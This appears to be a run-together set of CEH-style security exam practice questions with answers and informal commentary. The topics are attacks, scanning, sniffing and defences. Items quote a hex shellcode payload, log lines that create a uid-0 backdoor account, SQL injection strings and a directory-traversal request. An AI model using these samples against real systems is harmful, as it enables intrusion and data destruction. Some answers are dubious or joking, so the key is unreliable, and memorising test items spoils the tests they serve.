A. A buffer overflow. The IDS log file is depicting numerous attacks, however, most of them are from different attackers. In reference to the attack in question, he is trying to mask his activity through appearing legitimate. During his session on the honeypot, he changes users two time sby using the "su" command.
When writing shellcodes, you must avoid ____________ because these will end the string.A. Null bytesB. Root bytesC. Unicode bytesD. Char bytes
A. Null bytes.The null character (aka the null terminator) is a character with the value zero, present in the ASCII and Unicode character sets, and available in nearly all mainstream programming languages. The original meaning of this character was like NOP, when sent to a printer or terminal, it does nothing. (Some terminals, however, incorrectly display it as a space) Strings ending in a null character are said to be null terminated.
William has received a Tetris game from someone in his computer programming class through email.William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Tetris.After William installs the game, he plays it for a couple of hours.The next day, William plays the Tetris game again and notices that his machine has begun to slow down. He brings up his Task Manager and sees the following programs running. What has William just installed?A. Zombie Zapper (ZoZ)B. Root Digger (RD)C. Bot IRC Tunnel (BIT)D. Remote Access Trojan (RAT)
D. Remote Access TrojanRATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. On a basic level, many RATs mimic the functionality of legitimate remote control programs such as Symantec's pcAnywhere, but are designed specifically for stealth installation and operation. Intruders usually hide these Trojan horses in games and other small programs that unsuspecting users then execute on their PCs. Typically, exploited users either download and execute the malicious programs or are tricked into clicking rogue e-mail attachments.
This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments andthe IDS will not spot the true nature of the fully assembled datagram. The datagram is notreassembled until it reaches its final destination. It would be a processor-intensive task for an IDSto reassemble all fragments itself, and on a busy system the packet will slip through the IDS ontothe network.What is this technique called?A. IP Splicing or Packet ReassemblyB. IP Routing or Packet DroppingC. IDS Spoofing or Session AssemblyD. IP Fragmentation or Session Splicing
D. IP fragmentation or session splicing. The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload overmultiple packets thus defeating simple pattern matching without session reconstruction. Thispayload can be delivered in many different manners and even spread out over a long period oftime. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in thewild.
You went to great lengths to install all the necessary technologies to prevent hacking attacks, suchas expensive firewalls, antivirus software, antispam systems and intrusion detection/preventiontools in your company's network. You have configured the most secure policies and tightenedevery device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place.Your peer, Peter Smith who works at the same department disagrees with you. He says even thebest network security technologies cannot prevent hackers gaining access to the network becauseof presence of "weakest link" in the security chain.What is Peter Smith talking about?A. Untrained staff or ignorant computer users who inadvertently become the weakest link in yoursecurity chainB. Continuous Spam e-mails cannot be blocked by your security system since spammers usedifferent techniques to bypass the filters in your gatewayC. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able todetect these attacksD. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks
A. Untrained staff or ignorant computer users who inadvertently vecome the weakest link in your security chain.
Pearls Productions, an e-commerce website (http://www. pearl-productions-shop.com) uses acookie to keep a user session active once a user has logged in. When a user successfully logs into the application, a cookie is sent to the client containing the user ID, and this is referred to whenthe user requests certain functions from the server to make sure that the user has certain rights.How would you compromise this system, which relies on cookie-based security?A. Delete the cookie and reestablish connection to the server and access higher level privilegesB. Intercept the communication between the client and the server and change the cookie to makethe server believe that there is a user with higher privilegesC. Brute force the encryption used by the cookie and replay it back to the serverD. Inject the cookie ID into the web URL and connect back to the server
B. Intercept the communication between the client and the server and change the cookie to make the server believe that there is a user with higher privileges.
What is the problem with this ASP script (login.asp)?<%Set objConn = CreateObject("ADODB.Connection")objConn.Open Application("WebUsersConnection")sSQL="SELECT * FROM Users where Username='" & Request("user") & _"' and Password='" & Request("pwd") & "'"Set RS = objConn.Execute(sSQL)If RS.EOF thenResponse.Redirect("login.asp?msg=Invalid Login")ElseSession.Authorized = TrueSet RS = nothingSet objConn = nothingResponse.Redirect("mainpage.asp")End If%>A. The ASP script is vulnerable to Cross Site Scripting attackB. The ASP script is vulnerable to XSS attackC. The ASP script is vulnerable to SQL Injection attackD. The ASP script is vulnerable to Session Splice attack
C. The ASP script is vulnerable to SQL Injection attack.
You are the security administrator of Jaco Banking Systems located in Boston. You are setting up an e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customers with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time.Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer.You are confident that this security implementation will protect the customer from password abuse.Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer's username/passwords this way. They transferred money from the customer's bank account to various offshore accounts.Your decision of password policy implementation has cost the bank $925,000.You immediately shut down the e-banking website while figuring out the next best security solution.What effective security solution will you recommend in this case?A. Implement Biometrics based password authentication system. Record the customers face image to the authentication databaseB. Configure your firewall to block logon attempts of more than three wrong triesC. Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password historiesD. Implement RSA SecureID based authentication system
D. Implement RSA SecureID based authentication system (Unless it's 2011, and RSA has just been hacked, and their algorithms stolen...)
How does traceroute map the route a packet travels from point A to point B?A. It uses a protocol that will be rejected by gateways on its way to the destinationB. It manipulates the flags within packets to force gateways into generating error messagesC. It uses a TCP timestamp packet that will elicit a time exceeded in transit messageD. It manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message
D. It manipulates the value of the Time to Live (TTL) within packet to elicit a time exceeded in transit message. Traceroute works by increasing the Time-To-Live (TTL) value of each successive batch of packets sent. The first three packets haev a TTL value of one (implying that they make a single hop). The next three have a value of 2, and so on. When a packet passes through a host, normally the host decrements the TTL value by one, and forward the packet to the next host. When a packet with a TTL of one reaches a host, the host discards the packet, and send an ICMP time exceeded (type 11) packet to the sender. The traceroute utility uses these returning packets to produce a list of hosts that that the packets have traversed en route to their destination.
Study the following log extract and identify the attack:A. Cross Site ScriptingB. Hexcode AttackC. Unicode Directory Traversal AttackD. Multiple Domain Traversal Attack
C. Unicode Directory Traversal Attack. The "Get /msadc/....../....../....../winnt/system32/cmd.exe?" shows that a Unicode Directory Traversal Attack has been performed.
What does the following command in "Ettercap" do?ettercap -NCLzs --quietA. This command will provide you the entire list of hosts in the LANB. This command will detach ettercap from console and log all the sniffed passwords to a fileC. This command will check if someone is poisoning you and will report its IPD. This command broadcasts ping to scan the LAN instead of ARP request all the subnet IPs
B. This command will detach ettercap from console and log all the sniffed passwords to a file. -L specifies that logging will be done to a binary file and -s tells us that it is running in script mode.
John runs a Web server, IDS and firewall on his network. Recently his Web server has been underconstant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but theWeb server constantly locks up and needs rebooting due to various brute force and bufferoverflow attacks but still the IDS alerts no intrusion whatsoever.John becomes suspicious and views the Firewall logs and he notices huge SSL connectionsconstantly hitting his Web server.Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server andthat was the reason the IDS did not detect the intrusions.How would John protect his network from these types of attacks?A. Install a proxy server and terminate SSL at the proxyB. Enable the Firewall to filter encrypted HTTPS trafficC. Enable the IDS to filter encrypted HTTPS trafficD. Install a hardware SSL "accelerator" and terminate SSL at this layer
A. Install a proxy sever and terminate SSL at the proxy, D. Install a hardware SSL accelerator, and terminate SSL at this layer. By terminating the SSL connection at a proxy or a SSL accelerator, and then using clear text the distance between the proxy/accelerator and the server, you make it possible for the IDS to scan the traffic.
Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob need to take to successfully implement this?A. Disable all wireless protocols at the firewallB. Disable SNMP on the network so wireless devices cannot be configuredC. Continuously survey the area for wireless devicesD. Purchase a device that jams wireless signalsE. Train users in the new policy
C. Continuously survey the area for wireless devices.E. Train users in the new policy.If someone installs an access point and connects it with the network, there is no way to find it unless you are constantly surveying the area for wireless devices. SNMP and firewalls cannot prevent the installation of wireless devices on the corporate network.
Which of the following is not considered to be a part of active sniffing?A. MAC DuplicatingB. SMAC FuelingC. ARP SpoofingD. MAC Flooding

B. SMAC Fueling Because it doesn't exist. MAC duplicating, ARP spoofing and MAC flooding are all part of active sniffing. CEH writers are a-holes.

The SYN flood attack sends TCP connections requests faster than a machine can process them. Attacker creates a random source address for each packet SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP address. Victim responds to spoofed IP address, then waits for confirmation that never arrives (timeout wait is about 3 minutes) Victim's connection table fills up waiting for replies and ignores new connections Legitimate users are ignored and will not be able to access the server How do you protect your network against SYN Flood attacks? A. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection. B. Check the incoming packet's IP address with the SPAM database on the Internet and enable the filter using ACLs at the Firewall C. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally D. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16- bytes for the incoming SYN object E. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first

A. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection.C. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normallyD. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16-bytes for the incoming SYN objectE. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first
While investigating a claim of a user downloading illegal material, the investigator goes throughthe files on the suspect's workstation. He comes across a file that is just called "file.txt" but whenhe opens it, he finds the following:#define MAKE_STR_FROM_RET(x)((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)char infin_loop[]= /* for testing purposes */"\xEB\xFE";char bsdcode[] = /* Lam3rZ chroot() code by venglin */"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43""\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0""\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0""\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80""\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9""\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75""\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd""\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46""\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56""\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53""\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30""\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e""\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];static char *magic_str=NULL;int before_len=0;What can he infer from this file? A. A picture that has been renamed with a .txt extensionB. An encrypted fileC. A uuencoded fileD. A buffer overflow
D. A buffer overflow exploit.This is a buffer overflow exploit with its payload in hexadecimal format.
Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usuallyspoof the originating IP addresses and send the requests at the reflectors. These reflectors(usually routers or high-powered servers with a large amount of network resources at theirdisposal) then reply to the spoofed targeted traffic by sending loads and loads of data to the finaltarget.How would you detect these reflectors on your network?A. Run Vulnerability scanner on your network to detect these reflectorsB. Run floodnet tool to detect these reflectorsC. Look for the banner text by running Zombie Zappers toolsD. Scan the network using Nmap for the services used by these reflectors
D. Scan the network using Nmap for the services used by these reflectors.
Which type of attack is port scanning?A. Information gatheringB. Denial of service attackC. Unauthorized accessD. Web server attack
A. Information gathering.
One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IPaddress.You send a ping request to the broadcast address 192.168.5.255.[root@ceh/root]# ping -b 192.168.5.255WARNING: pinging broadcast address PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data.64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms---------There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why?A. You cannot ping a broadcast address. The above scenario is wrong.B. You should send a ping request with this commandping 192.168.5.0-255C. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHOrequest aimed at the broadcast address or at the network address.D. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.
C. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.
Larry is a criminal hacker with over 20 years of experience in breaking into systems. Larry's main objective used to entail defacing government and big corporation websites with information they did not want released to the public. But within the last few years, Larry has found avenues ofcreating revenue through breaking into systems and selling the information. On numerous occasions, Larry was able to break into the networks of small local banks and glean sensitive customer information including names, social security numbers, bank account numbers, and PINs.Larry then sold this information through covert channels to dummy corporations based in EasternEurope where cyber-law has not matured yet. Larry has been able to cover his tracks in the past, but with the rise of new technology such as honeypots, Larry is concerned about falling into trapsset by security professionals.What tool could Larry use to help evade traps like honeypots?A. Honeyd evasion serverB. Send-Safe proxy serverC. SPECTER relay serverD. KFSensor tunneling server
B. Send-Safe proxy server.Larry no longer has to worry about this, however, as he has found cushy employment with Wikileaks...
How would you prevent session hijacking attacks?A. Using non-Internet protocols like http secures sessions against hijackingB. Using biometrics access tokens secures sessions against hijackingC. Using hardware-based authentication secures sessions against hijackingD. Using unpredictable sequence numbers secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking. Protection of a session needs to focus on the unique session identifier, because it is the only thing that distinguishes between users. If the session ID is compromised, attackers can impersonate other users on the system. The first thing is to ensure that the sequence of identification numbers issued by the session management system is unpredictable; otherwise it's trivial to hijack another user's session. Having a large number of possible session IDs (which means they should be very long) means that an attacker is forced to try a lot more permutations.
Maurine is working as a security consultant for Hinklemeir Associates. She has asked the SystemsAdministrator to create a group policy that would not allow null sessions on the network. TheSystems Administrator is fresh out of college and has never heard of null sessions and does notknow what they are used for. Maurine is trying to explain to the Systems Administrator thathackers will try to create a null session when footprinting the network.Why would an attacker try to create a null session with a computer on a network?A. To create a user with administrative privileges for later useB. Enumerate users and sharesC. Install a backdoor for later attacksD. Escalate his/her privileges on the target server
B. To enumerate users and shares. The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number 5 Windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of the flaws in the CIFS/SMB (Common Internet File System / Server Messaging Block) architecture. You can establish a Null SEssion with a Windows (NT/2000/XP) host by logging on with a null username and PW. Using these null connections allows you to gather the following information from the host:-List of users and groups-List of machines-List of shares-Users and host SIDs
You are performing a port scan on a subnet that has the ICMP protocol blocked. You discover 23live systems and after doing a port scan on each of them; you notice that they all show port 21 inclosed state. What would be the next logical step that you should perform?A. Perform a ping sweep to identify any additional systems that might be upB. Connect to open ports to discover applicationsC. Perform a SYN scan on port 21 to identify any additional systems that might be upD. Rescan every computer to verify the results
C. Perform a SYN scan on Port 21 to find any additional systems that might be up. As ICMP is blocked, you'll have trouble determining which computers are up and running by using a ping sweep. As all the 23 computeres that you had discovered earlier had port 21 closed, it's probable that any additional, previously unknown systems will also have port 21 closed. By running a SYN scan on port 21 over the target network, you might get replies from additional systems.
While examining audit logs, you discover that people are able to telnet into the SMTP server onport 25. You would like to block this, though you do not see any evidence of an attack or otherwrong doing. However, you are concerned about affecting the normal functionality of the emailserver. From the following options choose how best you can achieve this objective?A. Block port 25 at the firewallB. Shut off the SMTP service on the serverC. Force all connections to use a username and passwordD. None of the aboveE. Switch from Windows Exchange to UNIX Sendmail
D. None of the above.Blocking port 25 in the firewall, or forcing all connections to use username and password would have the consequences that the server is unable to communicate with other SMTP servers. Turning off the SMTP service would disable the e-mail function completely. All e-mail servers use SMTP to communicate with other e-mail servers, adn therefore changing e-mail servers would not help.
_____ is the process of converting something from one representation to the simplest form. Itdeals with the way in which systems convert data from one form to another.A. UCS transformation formatsB. Character EncodingC. CanonicalizationD. Character Mapping
C. Canonicalization (c14n) is the process of converting data that has more than one possibl representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures (e.g. in combinatorics), to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.
A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 ofthe ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packetshad an ICMP ID:0 and Seq:0. What can you infer from this information?A. 13 packets were from an external network and probably behind a NAT, as they had an ICMP ID0 and Seq 0B. ICMP ID and Seq numbers were most likely set by a tool and not by the operating systemC. All 77 packets came from the same LAN segment and hence had the same ICMP ID and SeqnumberD. The packets were sent by a worm spoofing the IP addresses of 47 infected sites
B. ICMP ID and Seq numbers were most likely set by a tool, and not by the OS.
Harold has just been hired on as the senior network administrator for the University of Central Michigan. He essentially is in charge of 200 servers and about 10,000 client computers. Because of the immense network size of the university, Harold wants to centrally manage the network as much as possible.Harold supervises 10 server administrators, 4 Exchange administrators, and 20 help desk technicians. Because of the separated job duties, Harold wants to ensure that nothing is changed on the network without his knowledge and consent. His main concern is the 200 servers his subordinates take care of.Harold wants to be alerted whenever critical files, folders, shares, etc are changed on any of the servers, and he wants all this information available to him from one management console, not a console on each individual server. What tool could Harold use to centrally manage any changes on his servers?A. SAINTB. NessusC. SATAND. Tripwire
D. Tripwire
This is an authentication method in which is used to prove that a party knows a password withouttransmitting the password in any recoverable form over a network. This authentication is securebecause the password is never transmitted over the network, even in hashed form; only a randomnumber and an encrypted random number are sent.A. Realm AuthenticationB. SSL AuthenticationC. Basic Form AuthenticationD. Challenge/Response AuthenticationE. Cryptographic Authentication
D. Challenge / Response Authentication
Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of thefollowing lists the best options?A. RSA, LSA, POPB. SMB, SMTP, Smart cardC. SSID, WEP, KerberosD. Kerberos, Smart card, Stanford SRP
D. Kerberos, Smart Card, Stanford SRP.All three of these are techniques where the password never leaves the computer.
During the intelligence-gathering phase of a penetration test, you discover a press release by a security products vendor stating that they have signed a multi-million dollar agreement with the company you are targeting. The contract was for vulnerability assessment tools and networkbased IDS systems.While researching on that particular brand of IDS you notice that its default installation allows it toperform sniffing and attack analysis on one NIC and is managed and sends reports via another NIC. The sniffing interface is completely unbound from the TCP/IP stack by default. Assuming the defaults were used, how can you detect these sniffing interfaces?A. Send attack traffic and look for it to be dropped by the IDSB. Use a ping flood against the IP of the sniffing NIC and look for latency in the responsesC. Set your IP to that of the IDS and look for it to begin trying to knock your computer off the networkD. The sniffing interface cannot be detected
D. The sniffing interface cannot be detected. When a NIC is set to promiscuous mode, it blindly takes whatever comes through to its network interface and sends it to the Application layer. This is why they are so hard to detect.
After studying the following log entries, how many user IDs can you identify that the attacker hastampered with?1. mkdir -p /etc/X11/applnk/Internet/.etc2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd4. touch -acmr /etc /etc/X11/applnk/Internet/.etc5. passwd nobody -d6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash7. passwd dns -d8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd9. touch -acmr /etc/X11/applnk/Internet/.etc /etcA. nobody, dnsB. nobody, IUSR_C. IUSR_D. acmr.dns
A. nobody.dnsPasswd is the command used to modify a user password, and it has been used together with the usernames nobody and dns.
Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank hasdeployed a new Internet-accessible Web application recently. Customers can access their accountbalances, transfer money between accounts, pay bills and conduct online financial business usinga Web browser.John Stevens is in charge of information security at Bank of Timbuktu. After one month inproduction, several customers have complained about the Internet enabled banking application.Strangely, the account balances of many of the bank's customers had been changed! However,money hasn't been removed from the bank; instead, money was transferred between accounts.Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:Attempted login of unknown user: johnmAttempted login of unknown user: susaRAttempted login of unknown user: sencatAttempted login of unknown user: pete'';Attempted login of unknown user: ' or 1=1--Attempted login of unknown user: '; drop table logins--Login of user jason, sessionID= 0x75627578626F6F6BLogin of user daniel, sessionID= 0x98627579539E13BELogin of user rebecca, sessionID= 0x9062757944CCB811Login of user mike, sessionID= 0x9062757935FB5C64Transfer Funds user jasonPay Bill user mikeLogout of user mikeWhat kind of attack did the Hacker attempt to carry out at the bank?A. The Hacker first attempted logins with suspected user names, then used SQL Injection to gain access to valid bank login IDs.B. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.C. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.D. The Hacker used a generator module to pass results to the Web server and exploited Web application CGI vulnerability.
A. The hacker first attempted logins with suspected user names, then used SQL injection to gain access to valid bank login IDs. Typing things like ' or 1=1 - in the login field is evidence of a hacker trying out whether the system is vulnerable to SQL injection.
System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?A. Search for the target company name at http://groups.google.comB. Search in Google using the key search strings "thetarget company" and "newsgroups"C. Use NNTP websites to search for these postingsD. Search in Google using the key search strings "the target company" and "forums"
A. Search for the target company name at http://groups.google.comThis is the easiest way to access various newsgroups today. (Who the hell uses newsgroups anymore?) Before http://groups.google.com you had to use special NNTP clients or subscribe to some NNTP to Web services. That is, after you'd booted up your old coal-burning computer and fed it some punch-cards...
While attempting to discover the remote operating system on the target computer, you receive thefollowing results from an nmap scan:Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )Interesting ports on 172.121.12.222:(The 1592 ports scanned but not shown below are in state: filtered)PortStateService21/tcpopenftp25/tcpopensmtp53/tcpcloseddomain80/tcpopenhttp443/tcpopenhttpRemote operating system guess: Too many signatures match to reliably guess the OS.Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 secondsWhat would you do next to fingerprint the OS?A. Perform a tcp traceroute to the system using port 53B. Run an nmap scan with the -vv optionC. Perform a Firewalk with that system as the target IPD. Connect to the active services and review the banner information
D. Connect to the active services and review the banner information. Most people don't care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.
What can you conclude from the following nmap results?Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )Interesting ports on 192.168.1.1:(The 1592 ports scanned but not shown below are in state: closed)PortStateService21/tcpopenftp25/tcpopensmtp80/tcpopenhttp389/tcpopenldap443/tcpopenhttps3268/tcpopengcRemote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 secondsA. The system is not running Linux or SolarisB. The system is not firewall enabledC. The system is a Windows Domain ControllerD. The system is not properly patched.
B. The system is not firewall enabled, C. The system is a Windows Domain Controller. There is no report of any ports being filtered.
A company is legally liable for the content of email that is sent from its systems, regardless ofwhether the message was sent for private or business-related purposes. This could lead toprosecution for the sender and for the company's directors if, for example, outgoing email wasfound to contain material that was pornographic, racist, or likely to incite someone to commit anact of terrorism.You can always defend yourself by "ignorance of the law" clause.A. FalseB. True
A. FalseWTF does "ignorance of the law" have to do with the facts of the question? The issue is whether the company is legally liable for the acts of an employee on their IS ("did they know, or should they have known...")But, give 'em half a point for knowing the Latin terminology for "ignorance of the law is no excuse."
Port scans are often used to profile systems before they are attacked. Knowing what ports areopen allows an attacker to determine which services can be attacked.How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your network?A. Block TCP/IP packets with FIN flag enabled at the firewallB. Enable IDS signatures to block these scansC. You cannot block a hacker from launching these scans on your networkD. Modify the kernel to never send reset (RST) packets
D. Modify the kernel to never send RST (reset) packets.
Within the context of Computer Security, which of the following statements describes Social Engineering best?A. Social Engineering is the means put in place by human resource to perform time accountingB. Social Engineering is a training program within sociology studiesC. Social Engineering is the act of publicly disclosing informationD. Social Engineering is the act of getting needed information from a person rather than breaking into a system
D. Social engineering is the act of getting needed information from a person rather than breaking into a system.
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worriedthat adversaries might be monitoring the communication link and could inspect captured traffic.She would like to tunnel the information to the remote end but does not have VPN capabilities todo so. Which of the following tools can she use to protect the link?A. RSAB. PGPC. SSHD. MD5
C. SSHPort forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH. You can secure, for example, POP3, SMTP, and HTTP connections that would otherwise be insecure.
Choose one of the following pseudo codes to describe this statement:if we have written 200 characters to the buffer variable, the stack should stop because it cannothold any more data.A. If (I < 200) then exit (1)B. If (I > 200) then exit (1)C. If (I <= 200) then exit (1)D. If (I >= 200) then exit (1)
D. If (I>=200) then exit (1)
Which of the following LM hashes represents a password of less than 8 characters?A. 0182BD0BD4444BF836077A718CCDF409B. 44EFCE164AB921CQAAD3B435B51404EEC. BA810DBA98995F1817306D272A9441BBD. E52CAC67419A9A224A3B108F3FA6CB6DE. CEC52EB9C8E3455DC2265B23734E0DACF. B757BF5C0D87772FAAD3B435B51404EE
B, F. The last 8 characters of each of these hashes is the same, indicating that they have been padded.
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff theSMB exchange which carries user logons. The user is plugged into a hub with 23 other systems.However, he is unable to capture any logons though he knows that other users are logging on.What do you think is the most likely reason behind this?A. L0phtcrack only sniffs logons to web serversB. Kerberos is preventing itC. There is a NIDS present on that segmentD. Windows logons cannot be sniffed
B. Kerberos is preventing it. In a Windows 2000 network using Kerberos you normally use pre-authentication and the userpassword never leaves the local machine so it is never exposed to the network so it should not be able to be sniffed.
Michael is a junior security analyst working for the National Security Agency (NSA) workingprimarily on breaking terrorist encrypted messages. The NSA has a number of methods they useto decipher encrypted messages including Government Access to Keys (GAK) and insideinformants. The NSA holds secret backdoor keys to many of the encryption algorithms used on theInternet. The problem for the NSA, and Michael, is that terrorist organizations are starting to usecustom-built algorithms or obscure algorithms purchased from corrupt governments. For thisreason, Michael and other security analysts like him have been forced to find different methods ofdeciphering terrorist messages.One method that Michael thought of using was to hide malicious code inside seemingly harmlessprograms. Michael first monitors sites and bulletin boards used by known terrorists, and then he isable to glean email addresses to some of these suspected terrorists. Michael then inserts a stealthkeylogger into a mapping program file readme.txt and then sends that as an attachment to theterrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity intoa hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice aday with a built in SMTP server.What technique has Michael used to disguise this keylogging software?A. WrappingB. Hidden channelsC. SteganographyD. ADS
C. Steganography.
John is the network administrator of XSECURITY systems. His network was recently compromised. He analyzes the logfiles to investigate the attack.Take a look at the following Linux logfile snippet. The hacker compromised and "owned" a Linux machine. What is the hacker trying to accomplish here?A. The hacker is attempting to compromise more machines on the networkB. The hacker is trying to cover his tracksC. The hacker is running a buffer overflow exploit to lock down the systemD. The hacker is planting a rootkit
B. The hacker is trying to cover his tracks. By deleting temporary directories adn emptying files like bash_history that contains the last commands used with the bash shell he is trying to cover his tracks.
John has performed a scan of the web server with NMAP but did not gather enough information toaccurately identify which operating system is running on the remote host. How could you use aweb server to help in identifying the OS that is being used?A. Telnet to port 8080 on the web server and look at the default page codeB. Telnet to an open port and grab the bannerC. Connect to the web server with an FTP clientD. Connect to the web server with a browser and look at the web page
B. Telnet to an open port and grab the banner. Most people don't care about changing the banners presented by applications listening to open ports, and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.
After a client sends a connection request (SYN) packet to the server, the server will respond(SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) bythe client. This sequence number is predictable; the attack connects to a service first with its ownIP address, records the sequence number chosen, and then opens a second connection from aforged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, butcan guess the correct responses. If the source IP address is used for authentication, then theattacker can use the one-sided communication to break into the server.What attacks can you successfully launch against a server using the above technique?A. Web page defacement attacksB. Session Hijacking attacksC. Denial of Service attacksD. IP spoofing attacks
B. Session hijackingThe term session hijacking refers to the exploitation of a valid computer session-sometimes also called a session key- to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a "magic cookie" used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer.
A file integrity program such as Tripwire protects against Trojan horse attacks by:A. Using programming hooks to inform the kernel of Trojan horse behaviorB. Rejecting packets generated by Trojan horse programsC. Helping you catch unexpected changes to a system utility file that might indicate it had beenreplaced by a Trojan horseD. Automatically deleting Trojan horse programs
